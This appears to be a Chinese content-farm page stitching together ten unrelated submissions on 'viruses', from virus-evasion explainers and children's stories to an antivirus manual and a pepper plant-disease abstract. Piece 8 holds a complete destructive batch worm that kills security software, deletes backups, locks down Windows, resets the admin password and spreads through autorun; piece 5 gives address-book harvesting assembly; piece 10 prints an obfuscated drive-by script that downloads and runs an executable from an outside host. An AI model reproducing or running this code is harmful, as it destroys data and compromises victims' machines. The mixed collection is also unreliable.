超级病毒技术

“漫长的等待”通过精心收集，向本站投稿了10篇超级病毒技术，下面小编给大家整理后的超级病毒技术，供大家阅读参考。

篇1：超级病毒技术

超级病毒技术是一种很先进的病毒技术，它的主要目的是对抗计算机病毒的预防技术。

假定一个计算机病毒进行感染、破坏时，反病毒工具根本无法获取运行的机会，那么病毒的感染、破坏过程也可以顺利的完成了。由于计算机病毒的感染、破坏必然伴随着磁盘的读写操作，所以能否预防计算机病毒的关键在于：在对磁盘进行读写操作时，病毒预防工具能否获得运行的机会以对这些读写操作进行判断分析。

超级病毒技术就是在计算机病毒进行感染、破坏时，使得病毒预防工具无法获得运行机会的病毒技术，

一般病毒攻击计算机时，往往窃取某些中断功能，要借助于DOS的帮忙才能完成操作。例如，在PC机中病毒要写盘，必须借助于原DOS的INT 13H，病毒作者知道，反病毒工具（软件的或硬件的）都是在DOS中设置许多陷阱，等待病毒来碰，一碰陷阱，病毒便被抓获。超级病毒作者，以更高的技术编写了完全不借助于DOS系统而能攻击计算机的病毒。此类病毒攻击计算机时，完全依靠病毒内部代码来进行操作，避免碰触DOS系统，不会掉入反病毒陷阱，极难捕获。一般的软件或反病毒工具遇到此类病毒都失效。

超级计算机病毒目前还比较少，因为它的技术还不为许多人所知，而且编制也有相当的难度。然而一旦这种技术被越来越多的人掌握，同时结合多态性病毒技术、插入性病毒技术，这样的病毒将给反病毒的艰巨事业雪上加霜。

篇2：超级病毒

可是，

还是不断地收到市民发病身亡的报告。“看来，只好把所有

的电脑都销毁了，否则病毒还会继续蔓延。”市长看着这一

切，无奈地自言自语。于是，又一道命令发了出来：“A市上

所有的电脑都得销毁！”

N天后，我又在研究室里得出了一个惊人的结论：这种病

毒，原来是一种电脑病毒，因为一种特殊的电流，使它变成了

真正的病毒！”得出了这个结论，我就开始研究起这种病毒的

解药来。这时，我的手机突然收到了一条新闻：病毒不知到什

么原因，全部消失了！”这时，我真想把那个制造病毒的人找

篇3：超级病毒A11

动物们在一旁偷看，露出了欣慰的笑容・・・・・・

第二天，这一切简直让人不敢相信，这群病毒一晚上竟让5亿人死亡！接下来这几天，病毒们天天消灭人类，人类人口一下只剩下了100万人。动物们刚开始很高兴，可接下来，它们发现这群病毒不仅天天吞噬着人类的生命，而且连路过的动物也不放过。动物们很惊恐，心想：这些病毒简直比人类还可怕，如果再让他们这么下去，我们就自身难保了。

第二天，动物们找来病毒，告诉他们：“你们已经替我们报了仇，可以回去了。”

“不，我们不回去，这群人类太美味了，比恐龙还要美味100倍。告诉你们，等我们消灭完人类，再来消灭你们，趁人类还没有灭绝，你们还是过几天清闲的日子吧！哈哈哈哈！”病毒们恶狠狠的说。

“你，你们・・・・・・”一位动物的长者昏了过去。

（未待完续）

篇4：病毒隐藏技术

任何病毒都希望在被感染的计算机中隐藏起来不被发现，而这也是定义一个病毒行为的主要方面之一，因为病毒都只

有在不被发现的情况下，才能实施其破坏行为，为了达到这个目的，许多最新发现的病毒使用了各种不同的技术来躲避反

病毒软件的检验。而这种技术与最新的反病毒软件所使用的技术相似（本来就相同，大家是兄弟，病毒与杀毒软件，彼此

彼此）。

这次我们将讨论一些病毒所使用的最基本的隐藏技术，以后还将讨论一些较新较复杂的技术。

一个最常用最知名的技术被称为“秘密行动”法，这个技术的关键就是把病毒留下的有可能被立即发现的痕迹掩盖掉。

这些痕迹包括被感染文件莫名其妙增大或是文件建立时间的改变等，

由于它们太明显，很容易被用户发现，所以很多病毒

的制造者都会使用一种技术来截取从磁盘上读取文件的服务程序，通过这种技术就能使得已被改动过的文件大小和创建时

间看上去与改动前一样，这样就能骗过使用者使他们放松警惕。

在“秘密行动”法问世以后，由于常驻内存反病毒软件的出现，一种名为“钻隧道”的方法又被开发了出来。

常驻内存反病毒软件能防止病毒对计算机的破坏，它们能阻止病毒向磁盘的引导区和其它敏感区写入数据，约笆凳?lt;BR>对应用程序的修改和格式化硬盘等破坏活动。而“钻隧道”法能直接取得并使用为系统服务的原始内存地址，由此绕开常

驻内存的反病毒过滤器，这样病毒感染文件的时候就不会被反病毒软件发现。

通过以上的论述，也许大家就能了解安装集成了最新技术的反病毒软件的重要性。

篇5：超级简单超经典~病毒入门教材

.586p
.model flat,STDCALL
.data
MailFile db “My.WAB”,0
.code
extrn _lopen: proc,_lcreat: proc
extrn _lread: proc,_lwrite: proc
extrn _llseek: proc
extrn _lclose: proc
extrn MessageBoxA: proc
extrn ExitProcess: proc
extrn WideCharToMultiByte: proc
start:
call _lopen,offset MailFile,0
cmp eax,-1
jz short ExitProc
mov ebx,eax
sub esp,100h
mov edi,esp
call _lread,ebx,edi,100h
cmp eax,100h
jnz short CloseFile
mov eax,[edi+60h] ;得到Unicode邮件名偏移
call _llseek,ebx,eax,0
mov ecx,[edi+64h] ;得到Unicode邮件名个数
ContWabMail:
push ecx
call _lread,ebx,edi,44h ;读一个记录
cmp eax,44
sub esp,100h
mov eax,esp
call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0
mov eax,esp
call MessageBoxA,0,eax,eax,0
add esp,100h
pop ecx
loop short ContWabMail
Closefile:
call _lclose,ebx
ExitProc:
call ExitProcess,0
end start

篇6：超级巡警病毒查杀教程

扫描设置

扫描设置中，提供了对扫描的详细设置，主要分为：扫描到病毒后的处理方式，扫描报告的设置，扫描类型的设定和信任列表的添加，特殊模块的启用等等，

1、处理方式：

在处理方式中，你可以设置扫描到病毒后是自动清除还是仅仅报告给用户，如果是选择“自动清除”后，软件会自动选中“隔离区备份”。对清除的文件进行备份，这样如果有误操作也可以随时在隔离区中恢复回来。

2、扫描报告：

在扫描报告中，您自己设置喜欢的扫描报告文件名，并且根据自己的喜好设置每次的扫描记录是“追加”还是“覆盖”。

3、扫描类型：

在扫描类型的设置中，您可以设置让超级巡警扫描的文件类型，可以设置仅仅扫描可执行程序，还是全部文件，当然您也可以根据自己的需要设置相应的文件类型。一般来说，仅设置可执行程序就可以完全检测用户遇到的大部分具备危害的恶意代码。

4、其他设置：

在这里你可以添加/删除信任文件和目录，这些信任的文件和目录在扫描的时候会被忽略。

图：信任列表

5、特殊模块：

在这里，我们提供了一些我们独有的特色扫描方式，比如针对Rootkit检测，如果启用Rootkit检测后，系统将在每一次启动都进行Rootkit扫描。

图：扫描设置

全盘扫描

全面扫描功能可以全面的检查硬盘中的系统目录等特殊目录中的文件是否有可疑文件、木马、后门、间谍软件等恶意软件。

在超级巡警的主界面中，点击左侧的全面扫描，超级巡警会开始全面的检查用户系统。

内存扫描

内存扫描功能，通过检测当前系统的活动进程、注册表项来查找并删除在你系统运行的各种有害程序。

在超级巡警的主界面中，点击左侧的内存扫描，超级巡警会开始全面的检查用户的内存进程和动态库。

目录扫描

目录扫描，可以扫描和检测用户选择的目录，针对用户的选择进行间谍软件的检测和清除。

在在超级巡警的主界面中，点击左侧的目录扫描，超级巡警会开始检查用户的所选择的目录。

特色扫描Rookit

第一次运行本系统的时候，会强制检测用户机子上的顽固的、使用Rootkit技术的后门，长久以来，一些采用Rootkit技术的木马、后门、流氓软件无法被常规的反病毒软件扫描模块检测到，本功能自动的检测和清除用户机子上的使用Rootkit技术的各类有害程序，

如果你不是第一次运行本产品，也可以随时通过鼠标邮件菜单中的“开始检测Rootkit”和“停止检测Rootkit”菜单来进行Rootkit的检测。也可以在“扫描设置”中，设置每次运行本系统都进行Rootkit检测，最大限度的防护利用Rootkit技术的各类木马、后门。

扫描报告

查看每次的扫描记录，你可以在“扫描设置”中设置扫描记录是“追加”还是“覆盖”两

种方式。

下面就是一个典型的扫描报告日志：

==========================================================

---------------------------------------------------------------------------

目录扫描开始: -08-16 13:50:27

发现病毒:Backdoor.Win32.Rbot.gen 处理结果:仅报告 描述:后门文件 感染文

件:C:lxa.ex$

发现病毒:Backdoor.Win32.Hupigon.bvi 处理结果:仅报告 描述:灰鸽子木马，一种恶意远

程控制工具。 感染文件:C:lx.ex$

发现病毒:Trojan-Dropper.Win32.Delf.yi 处理结果:仅报告 描述:具备衍生其它病毒的木

马 感染文件:C:lxc.ex$

发现病毒:Rootkit.Win32.Vanti.dd 处理结果:仅报告 描述:内核级后门 感染文

件:C:lxd.dl$

发现病毒:Trojan-Downloader.Win32.Delf.aiy 处理结果:仅报告 描述:木马下载器 感染

文件:C:lxe.dl$

发现病毒:Trojan-PSW.Win32.QQPass.gb 处理结果:仅报告 描述:以窃取用户密码为主要功

能的木马 感染文件:C:lxf.dl$

发现病毒:Trojan-Proxy.Win32.Small.eg 处理结果:仅报告 描述:以提供代理功能为主的

木马 感染文件:C:lxflosProxy.exe

---------------------------------------------------------------------------

目录扫描结束: 2006-08-16 13:50:28

扫描的文件数: 8

扫描的包裹数: 0

发现的病毒数: 7

已清除的病毒数: 0

----------------------------------------------------------------------------

隔离区

存放检测到的病毒的备份，包括对无法完全清除的有害程序的隔离，防止病毒危害系统。

隔离区还提供了恢复被隔离的文件，直接删除隔离区中的文件，全部清空隔离区的功能。

篇7：病毒隐藏技术病毒防治

病毒隐藏技术

任何病毒都希望在被感染的计算机中隐藏起来不被发现，而这也是定义一个病毒行为的主要方面之一，因为病毒都只有在不被发现的情况下，才能实施其破坏行为，为了达到这个目的，许多最新发现的病毒使用了各种不同的技术来躲避反 病毒软件的检验。而这种技术与最新的反病毒软件所使用的技术相似（本来就相同，大家是兄弟，病毒与杀毒软件，彼此彼此）。

这次我们将讨论一些病毒所使用的最基本的隐藏技术，以后还将讨论一些较新较复杂的技术。

一个最常用最知名的技术被称为“秘密行动”法，这个技术的关键就是把病毒留下的有可能被立即发现的痕迹掩盖掉。 这些痕迹包括被感染文件莫名其妙增大或是文件建立时间的改变等。由于它们太明显，很容易被用户发现，所以很多病毒 的制造者都会使用一种技术来截取从磁盘上读取文件的服务程序，通过这种技术就能使得已被改动过的文件大小和创建时 间看上去与改动前一样，这样就能骗过使用者使他们放松警惕，

在“秘密行动”法问世以后，由于常驻内存反病毒软件的出现，一种名为“钻隧道”的方法又被开发了出来。

常驻内存反病毒软件能防止病毒对计算机的破坏，它们能阻止病毒向磁盘的引导区和其它敏感区写入数据，以及实施 对应用程序的修改和格式化硬盘等破坏活动。而“钻隧道”法能直接取得并使用为系统服务的原始内存地址，由此绕开常 驻内存的反病毒过滤器，这样病毒感染文件的时候就不会被反病毒软件发现。

通过以上的论述，也许大家就能了解安装集成了最新技术的反病毒软件的重要性。

关 键 字：病毒防治

篇8：制作编写超级批处理病毒病毒防范

网上的批处理病毒代码很少，我发一段我写的批处理给大家研究，我水平一般，也就只能写出这点东西了，大家多多包涵。废话不多说了，大家看代码，仅供研究，不要做坏事。

@echo offtitle You DEAD!!!!!!!set taskkill=scopy %0 %windir%\system32\cmd.batattrib %windir%\system32\cmd.bat +r +s +hnet stop sharedaccess >nul%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul%s% /im norton* /f >nul%s% /im av* /f >nul%s% /im fire* /f >nul%s% /im anti* /f >nul%s% /im spy* /f >nul%s% /im bullguard /f >nul%s% /im PersFw /f >nul%s% /im KAV* /f >nul%s% /im ZONEALARM /f >nul%s% /im SAFEWEB /f >nul%s% /im OUTPOST /f >nul%s% /im nv* /f >nul%s% /im nav* /f >nul%s% /im F-* /f >nul%s% /im ESAFE /f >nul%s% /im cle /f >nul%s% /im BLACKICE /f >nul%s% /im def* /f >nul%s% /im 360safe.exe /f >nulnet stop Shadow“ ”System“ ”Serviceset alldrive=d e f g h i j k l m n o p q r s t u v w x y zfor %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nulfor %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nulrem 修改注册表.......REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 4294967295 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000002 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows“ ”NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows“ ”NT\SystemRestore /v DisableConfig /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d 00000001 /f >nulclsnet user administrator 123456 >nulfor %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nulecho @echo off >d:\setup.batecho shutdown -r -t 10 -f -c 亲爱的朋友，我十分抱歉的通知你，你的电脑已经严重崩溃，请重新安装系统可以解决此问题!^.^ >>d:\setup.batecho copy d:\setup.bat c:\Documents“ ”and“ ”Settings\All“ ”Users\「开始」菜单\程序\启动\a.bat >>d:\setup.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.batHKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.batecho [windows] >>%windir%\win.iniecho run=d:\setup.bat C:\AUTOEXEC.BAT >>%windir%\win.iniecho load=d:\setup.bat C:\AUTOEXEC.BAT >>%windir%\win.iniecho [boot] >>%windir%\system.iniecho shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >>%windir%\system.iniecho [AutoRun] >d:\autorun.infecho pen=setup.bat >>d:\autorun.infecho pen=system.bat >>d:\autorun.infattrib d:\autorun.inf +r +s +h >>d:\setup.batattrib d:\setup.bat +r +s +h >>d:\setup.batstart d:\setup.bat /min >nulecho @echo off >>C:\AUTOEXEC.BATecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BATecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BATREG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BATecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f >>C:\AUTOEXEC.BATecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f >>C:\AUTOEXEC.BATREG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat /f >>C:\AUTOEXEC.BATecho if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BATcopy %0 %systemroot%\windows.bat >nulif not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.batif not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.batif not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %windir%/system32/explorer.bat/f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %windir%/system32/explorer.bat /f >>%windir%/system32/explorer.batecho start %systemroot%\windows.bat /min >>%windir%/system32/explorer.batattrib %windir%/system32/explorer.bat +r +s +h%attrib %systemroot%/windows.bat +r +s +hfor %%c in (%alldrive%) do echo @echo off >>%%c:\system.batfor %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.batfor %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.batset drive=e f g h i j k l m n o p q r s t u v w x y zfor %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inffor %%c in (%drive%) do echo pen=system.bat >>%%c:\autorun.infcopy %0 d:\Program“ ”Files\run.batfor %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program“ ”Files\run.bat /min >>%%c:\system.batfor %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.batfor %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nulfor %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nulif not exist %windir%/system32/explorer.bat start d:\Program“ ”Files\run.bat /min >>d:\setup.batattrib d:\Program“ ”Files\run.bat +r +s +h >nuldel %0exit

具体的意思我也不说了，太长了，有点批处理基础的朋友应该都看得懂.

虽然我检查过，但是写这么长难免有错误，哪里写错了，还请高手们多多指点，

篇9：色素辣椒病毒病防治技术

色素辣椒病毒病防治技术

0 引言 色素辣椒病毒病的病毒是一种非细胞形态的生物,能为害各种生物.近年来,在辣椒生产上普遍发生危害,由于其侵染方式特殊,早期不为人注意,后期迅速蔓延,防治困难,常易造成大面积损失.根据我国近年鉴定结果,为害辣椒的病毒主要是黄瓜花叶病毒(CMV)与烟草花叶病毒(TMV).

作 者：张爱娟 颜咏梅 彭伟  作者单位：蔫耆县农业技术推广中心,新疆焉耆,841100 刊 名：新疆农业科技 英文刊名：XINJIANG AGRICULTURAL SCIENCE AND TECHNOLOGY 年，卷(期)： “”(3) 分类号：S4 关键词： 

篇10：arp病毒利用的JS技术

本文的目的是探讨JS相关技术，并不是以杀毒为主要目的，杀毒只是为讲解一些JS做铺垫的，呵呵，文章有点长，倒杯咖啡或者清茶慢慢看，学习切勿急躁！

最近公司的网络中了这两天闹的很欢的ARP病毒，导致大家都无法上网，给工作带来了很大的不方便，在这里写下杀毒的过程，希望对大家能有帮助！

现象：

打开部分网页显示为乱码，好像是随机的行为，但是看似又不是，因为它一直在监视msn.com，呵呵，可能和微软有仇吧，继续查看源代码，发现头部有一个js文件链接----；

来源：

经过一番网络搜索，发现这个域名是印度域名，而IP地址却是美国的，而且域名的注册日期是7月25日，看来一切都是预谋好了的，还是不管这个了，先解决问题吧；

分析：

1、先把（9-6.in/n.js）这个JS文件下载下来，代码如下：

document.writeln(“”);

document.writeln(“”);

document.writeln(“”)

其中第一句window.onerror=function(){return true;}就先把JS错误屏蔽掉，真够狠的，呵呵，不这样怎么隐藏自己呢，哈哈！然后还有个JS文件 9-6.in/S368/NewJs2.js，先继续往下看，找到StartRun();运行一个函数，函数的主要作用是写COOKIE，日期为保存一天，然后还用隐藏框架加载了一个文件（9-6.IN/s368/T368.htm），其余就没有什么特别的了；

2、下载（9-6.in/S368/NewJs2.js）这个文件，代码如下：

StrInfo = “x3cx73x63x72x69x70x74x3ex77x69x6ex64x6fx77x2ex6fx6ex65x72x72x6fx72x3dx66x75x6ex63x74x69x6fx6ex28x29x7bx72x65x74x75x72x6e x74x72x75x65x3bx7dx3cx2fx73x63x72x69x70x74x3e” +“ ”+

“x3cx73x63x72x69x70x74x3e” +“ ”+

“ x44x5ax3d'\x78x36x38\x78x37x34\x78x37x34\x78x37x30\x78x33x41\x78x32x46\x78x32x46\x78x33x39\x78x32x44\x78x33x36\x78x32x45\x78x36x39\x78x36x45\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x45\x78x36x35\x78x37x38\x78x36x35'x3b” +“ ”+

“ x4ex6fx73x6bx73x6cx61x3d''x3b” +“ ”+

“x66x75x6ex63x74x69x6fx6e x47x6ex4dx73x28x6ex29 ” +“ ”+

“x7b ” +“ ”+

“ x76x61x72 x6ex75x6dx62x65x72x4dx73 x3d x4dx61x74x68x2ex72x61x6ex64x6fx6dx28x29x2ax6ex3b” +“ ”+

“ x72x65x74x75x72x6e '\x78x37x45\x78x35x34\x78x36x35\x78x36x44\x78x37x30'x2bx4dx61x74x68x2ex72x6fx75x6ex64x28x6ex75x6dx62x65x72x4dx73x29x2b'\x78x32x45\x78x37x34\x78x36x44\x78x37x30'x3b” +“ ”+

“x7d ” +“ ”+

“ x74x72x79 ” +“ ”+

“x7b” +“ ”+

“ x4ex6fx73x6bx73x6cx61x3d''x3b” +“ ”+

“ x76x61x72 x42x66x3dx64x6fx63x75x6dx65x6ex74x2ex63x72x65x61x74x65x45x6cx65x6dx65x6ex74x28”\x78x36x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34“x29x3b” +“ ”+

“ x42x66x2ex73x65x74x41x74x74x72x69x62x75x74x65x28”\x78x36x33\x78x36x43\x78x36x31\x78x37x33\x78x37x33\x78x36x39\x78x36x34“x2c”\x78x36x33\x78x36x43\x78x37x33\x78x36x39\x78x36x34\x78x33x41\x78x34x32\x78x34x34\x78x33x39\x78x33x36\x78x34x33\x78x33x35\x78x33x35\x78x33x36\x78x32x44\x78x33x36\x78x33x35\x78x34x31\x78x33x33\x78x32x44\x78x33x31\x78x33x31\x78x34x34\x78x33x30\x78x32x44\x78x33x39\x78x33x38\x78x33x33\x78x34x31\x78x32x44\x78x33x30\x78x33x30\x78x34x33\x78x33x30\x78x33x34\x78x34x36\x78x34x33\x78x33x32\x78x33x39\x78x34x35\x78x33x33\x78x33x36“x29x3b” +“ ”+

“ x76x61x72 x4bx78x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28”\x78x34x44\x78x36x39\x78x36x33\x78x37x32\x78x36x46\x78x37x33\x78x36x46\x78x36x36\x78x37x34\x78x32x45\x78x35x38“x2b”\x78x34x44\x78x34x43\x78x34x38\x78x35x34\x78x35x34\x78x35x30“x2c”“x29x3b” +“ ”+

“ x76x61x72 x41x53x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28”\x78x34x31\x78x36x34\x78x36x46\x78x36x34\x78x36x32\x78x32x45\x78x35x33\x78x37x34\x78x37x32\x78x36x35\x78x36x31\x78x36x44“x2c”“x29x3b” +“ ”+

“ x4ex6fx73x6bx73x6cx61x3d''x3b” +“ ”+

“ x41x53x2ex74x79x70x65x3dx31x3b” +“ ”+

“ x4ex6fx73x6bx73x6cx61x3d''x3b” +“ ”+

“ x4bx78x2ex6fx70x65x6ex28”\x78x34x37\x78x34x35\x78x35x34“x2c x44x5ax2cx30x29x3b” +“ ”+

“ x4ex6fx73x6bx73x6cx61x3d''x3b” +“ ”+

“ x4bx78x2ex73x65x6ex64x28x29x3b” +“ ”+

“ x4ex6fx73x6bx73x6cx61x3d''x3b” +“ ”+

“ x4ex73x31x3dx47x6ex4dx73x28x39x39x39x39x29x3b” +“ ”+

“ x4ex6fx73x6bx73x6cx61x3d''x3b” +“ ”+

“ x76x61x72 x63x46x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28”\x78x35x33\x78x36x33\x78x37x32\x78x36x39\x78x37x30\x78x37x34\x78x36x39\x78x36x45\x78x36x37\x78x32x45\x78x34x36\x78x36x39\x78x36x43\x78x36x35\x78x35x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x34x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34“x2c”“x29x3b” +“ ”+

“ x76x61x72 x4ex73x54x6dx70x3dx63x46x2ex47x65x74x53x70x65x63x69x61x6cx46x6fx6cx64x65x72x28x30x29x3b x4ex73x31x3d x63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2cx4ex73x31x29x3b x41x53x2ex4fx70x65x6ex28x29x3bx41x53x2ex57x72x69x74x65x28x4bx78x2ex72x65x73x70x6fx6ex73x65x42x6fx64x79x29x3b” +“ ”+

“ x41x53x2ex53x61x76x65x54x6fx46x69x6cx65x28x4ex73x31x2cx32x29x3b x41x53x2ex43x6cx6fx73x65x28x29x3b x76x61x72 x71x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28”\x78x35x33\x78x36x38\x78x36x35\x78x36x43\x78x36x43\x78x32x45\x78x34x31\x78x37x30\x78x37x30\x78x36x43\x78x36x39\x78x36x33\x78x36x31\x78x37x34\x78x36x39\x78x36x46\x78x36x45“x2c”“x29x3b” +“ ”+

“ x6fx6bx31x3dx63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2b'\x78x35x43\x78x35x43\x78x37x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x33x33\x78x33x32'x2c'\x78x36x33\x78x36x44\x78x36x34\x78x32x45\x78x36x35\x78x37x38\x78x36x35'x29x3b” +“ ”+

“ x71x2ex53x48x65x4cx4cx45x78x65x63x75x74x65x28x6fx6bx31x2c'\x78x32x30\x78x32x46\x78x36x33 'x2bx4ex73x31x2c”“x2c”\x78x36x46\x78x37x30\x78x36x35\x78x36x45“x2cx30x29x3b” +“ ”+

“ x4ex6fx73x6bx73x6cx61x3d''x3b” +“ ”+

“x7d ” +“ ”+

“ x63x61x74x63x68x28x4dx73x49x29 x7b x4dx73x49x3dx31x3b x7d” +“ ”+

“ x4ex6fx73x6bx73x6cx61x3d''x3b” +“ ”+

“x3cx2fx73x63x72x69x70x74x3e”

window[“x64x6fx63x75x6dx65x6ex74”][“x77x72x69x74x65”](StrInfo);

这个代码有点长哦，而且有保护措施，全部转换为十六进制，不过不要害怕，我们有办法解决，首先得确保你已经安装了UE，然后打开UE，把代码粘贴进去（废话，呵呵），把x替换为%，然后用html代码转换功能，解码，就可以得到第一次解码的代码，第一次？？？，呵呵，这个代码的作者很变态的，做了两次编码，所以我得进行两次解码才行，重复刚才的步骤，然后你就可以看到最终的“原始”代码了；

具体的代码我就不帖出来了，有一定的危害性，相信大家看了上面的步骤都能自己找到代码，这里之说一下比较核心的代码吧；

//核心代码

..............

“ var Bf=document.createElement(”ojec “);” +“ ”+

“ Bf.setAttribute(”classid“,”clsid:BD96C556-65A3-11D -983A- C 4FC29E36“);” +“ ”+

“ var Kx=Bf.CreateObject(”Mic osof .X“+”MLHTTP“,”“);” +“ ”+

“ var AS=Bf.CreateObject(”Adod.S eam“,”“);” +“ ”+

.............

“ var cF=Bf.CreateObject(”Sc ip i g.FileSys emOjec “,”“);” +“ ”+

“ var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);” +“ ”+

“ AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject(”Shell.Applica io “,”“);” +“ ”+

“ ok1=cF.BuildPath(NsTmp+'\\sys em32','cmd.exe');” +“ ”+

“ q.SHeLLExecute(ok1,' /c '+Ns1,”“,”ope “,0);” +“ ”+

..............

上面的就是最为核心的代码，利用MS0614漏洞、创建JS异步对象获取病毒（*.exe）文件，然后运行，这样就达到它的目的啦！

3、打开 9-6.IN/s368/T368.htm查看源代码，又发现一段怪异的JS文件，如下：

可以看出这段代码也是经过加密的了，特征为function(p,a,c,k,e,d)，这种加密方法网上有很多例子，我就不细说了，附上解密代码：

